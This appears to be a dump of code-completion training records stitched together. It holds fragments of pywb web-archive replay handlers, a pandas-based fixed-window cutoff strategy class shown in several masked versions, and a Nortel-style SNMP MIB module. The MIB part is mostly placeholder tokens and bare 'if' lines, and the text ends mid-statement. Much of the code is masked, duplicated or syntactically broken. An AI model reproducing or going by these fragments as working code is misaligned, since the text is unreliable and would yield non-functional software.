self.index_reader.cdx_load_callback(wbrequest)\n return self.replay.render_content(wbrequest, cdx_lines, cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if not self.fallback_handler or wbrequest.wb_url.is_query(\n ) or wbrequest.wb_url.is_identity:\n raise\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = 
wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-5": "import pkgutil\nimport mimetypes\nimport time\n\nfrom datetime import datetime\n\nfrom pywb.utils.wbexception import NotFoundException\nfrom pywb.utils.loaders import BlockLoader\nfrom pywb.utils.statusandheaders import StatusAndHeaders\n\nfrom pywb.framework.basehandlers import BaseHandler, WbUrlHandler\nfrom pywb.framework.wbrequestresponse import WbResponse\n\nfrom pywb.warc.recordloader import ArcWarcRecordLoader\nfrom pywb.warc.resolvingloader import ResolvingLoader\n\nfrom views import J2TemplateView\nfrom replay_views import ReplayView\nfrom pywb.framework.memento import MementoResponse\nfrom pywb.utils.timeutils import datetime_to_timestamp\n\n\n#=================================================================\nclass SearchPageWbUrlHandler(WbUrlHandler):\n \"\"\"\n Loads a default search page html template to be shown when\n the wb_url is empty\n \"\"\"\n def __init__(self, config):\n self.search_view = (J2TemplateView.\n create_template(config.get('search_html'),\n 'Search Page'))\n\n self.is_frame_mode = config.get('framed_replay', False)\n self.response_class = WbResponse\n\n if self.is_frame_mode:\n html = config.get('frame_insert_html', 'ui/frame_insert.html')\n self.frame_insert_view = (J2TemplateView.\n create_template(html, 'Frame Insert'))\n\n self.banner_html = config.get('banner_html', 'banner.html')\n \n if config.get('enable_memento', False):\n self.response_class = MementoResponse\n\n else:\n self.frame_insert_view = None\n self.banner_html = None\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix,\n **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n # root search page\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n\n # render top level frame if in frame mode\n # (not supported in proxy mode)\n if (self.is_frame_mode 
and wbrequest.wb_url and\n not wbrequest.wb_url.is_query() and\n not wbrequest.options['is_proxy']):\n\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n\n return self.handle_request(wbrequest)\n\n def get_top_frame_params(self, wbrequest):\n embed_url = wbrequest.wb_url.to_str(mod='')\n\n if wbrequest.wb_url.timestamp:\n timestamp = wbrequest.wb_url.timestamp\n else:\n timestamp = datetime_to_timestamp(datetime.utcnow())\n\n params = dict(embed_url=embed_url,\n wbrequest=wbrequest,\n timestamp=timestamp,\n url=wbrequest.wb_url.url,\n banner_html=self.banner_html)\n\n return params\n\n def get_top_frame_response(self, wbrequest):\n params = self.get_top_frame_params(wbrequest)\n\n headers = [('Content-Type', 'text/html; charset=utf-8')]\n status_headers = StatusAndHeaders('200 OK', headers)\n\n template_result = self.frame_insert_view.render_to_string(**params)\n body = template_result.encode('utf-8')\n\n return self.response_class(status_headers, [body], wbrequest=wbrequest)\n\n\n#=================================================================\n# Standard WB Handler\n#=================================================================\nclass WBHandler(SearchPageWbUrlHandler):\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n\n self.index_reader = query_handler\n\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n\n paths = config.get('archive_paths')\n\n resolving_loader = ResolvingLoader(paths=paths,\n record_loader=record_loader)\n\n self.replay = ReplayView(resolving_loader, config)\n\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = 
self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest,\n cdx_lines,\n output)\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n\n return self.replay.render_content(wbrequest,\n cdx_lines,\n cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if (not self.fallback_handler or\n wbrequest.wb_url.is_query() or\n wbrequest.wb_url.is_identity):\n raise\n\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\n#=================================================================\n# Static Content Handler\n#=================================================================\nclass StaticHandler(BaseHandler):\n def __init__(self, static_path):\n mimetypes.init()\n\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n\n try:\n data = self.block_loader.load(full_path)\n\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda: data.read(), '')\n\n content_type, _ = mimetypes.guess_type(full_path)\n\n return WbResponse.text_stream(data,\n content_type=content_type,\n headers=headers)\n\n except IOError:\n raise NotFoundException('Static File Not Found: ' +\n wbrequest.wb_url_str)\n\n def __str__(self): # pragma: no cover\n return 'Static files from ' + 
self.static_path\n\n\n#=================================================================\n# Debug Handlers\n#=================================================================\nclass DebugEchoEnvHandler(BaseHandler): # pragma: no cover\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\n#=================================================================\nclass DebugEchoHandler(BaseHandler): # pragma: no cover\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-ids": [
10,
19,
21,
22,
25
]
}
|
[
10,
19,
21,
22,
25
] |
from datetime import timedelta
import pandas as pd
__all__ = ["FixWindowCutoffStrategy"]
class CutoffStrategy:
    """Holds a cutoff-time generation strategy, used to prevent leakage.

    Parameters
    ----------
    generate_fn : callable
        Generates a cutoff time for a given entity; takes entity rows and
        returns a training cutoff in np.datetime64 format.
    description : str
        Human-readable summary of the strategy.
    """

    def __init__(self, generate_fn, description='undescribed cutoff strategy'):
        # Store the strategy callable and its description verbatim.
        self.generate_fn = generate_fn
        self.description = description
class FixWindowCutoffStrategy(CutoffStrategy):
    """Tile ``[cutoff_base, cutoff_end]`` into fixed-size windows per entity.

    Parameters
    ----------
    entity_col : str
        Name of the entity-id column in the input DataFrame.
    cutoff_base : datetime-like
        Start of the first cutoff window.
    cutoff_end : datetime-like
        Upper bound; windows that would end past this are dropped.
    cutoff_window : int
        Window length in days.
    """

    def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):
        self.description = "in next {} days".format(cutoff_window)
        self.cutoff_base = cutoff_base
        self.cutoff_end = cutoff_end
        self.cutoff_window = cutoff_window
        self.entity_col = entity_col

    def generate_cutoffs(self, df):
        """Return a DataFrame of (entity, cutoff_st, cutoff_ed) rows.

        Every entity appearing in ``df[self.entity_col]`` is crossed with
        every complete window between ``cutoff_base`` and ``cutoff_end``.
        """
        cutoff_st_ed_pairs = []
        current = self.cutoff_base
        while True:
            current_end = current + timedelta(days=self.cutoff_window)
            if current_end > self.cutoff_end:
                break
            cutoff_st_ed_pairs.append((current, current_end))
            current = current_end

        # Series.unique() preserves first-appearance order, so the output row
        # order is deterministic across runs; iterating set(...) here varied
        # with string-hash randomization (PYTHONHASHSEED).
        entity_cutoffs = [
            (entity_name, cutoff_st, cutoff_ed)
            for entity_name in df[self.entity_col].unique()
            for cutoff_st, cutoff_ed in cutoff_st_ed_pairs
        ]

        return pd.DataFrame(entity_cutoffs,
                            columns=[self.entity_col, "cutoff_st", "cutoff_ed"])
|
normal
|
{
"blob_id": "30f030d48368e1b103f926ee7a15b4b75c4459c7",
"index": 7030,
"step-1": "<mask token>\n\n\nclass CutoffStrategy:\n <mask token>\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-2": "<mask token>\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-3": "<mask token>\n__all__ = ['FixWindowCutoffStrategy']\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-4": "from datetime import timedelta\nimport pandas as pd\n__all__ = ['FixWindowCutoffStrategy']\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-5": "from datetime import timedelta\n\nimport pandas as pd\n\n__all__ = [\"FixWindowCutoffStrategy\"]\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = \"in next {} days\".format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col, \"cutoff_st\", \"cutoff_ed\"])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
